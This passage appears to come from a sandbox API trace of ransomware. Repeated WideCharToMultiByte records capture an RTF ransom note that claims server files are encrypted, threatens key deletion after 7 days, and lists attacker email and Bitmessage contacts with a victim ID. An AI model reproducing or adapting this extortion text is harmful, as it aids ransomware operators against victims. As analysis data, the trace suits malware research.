ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 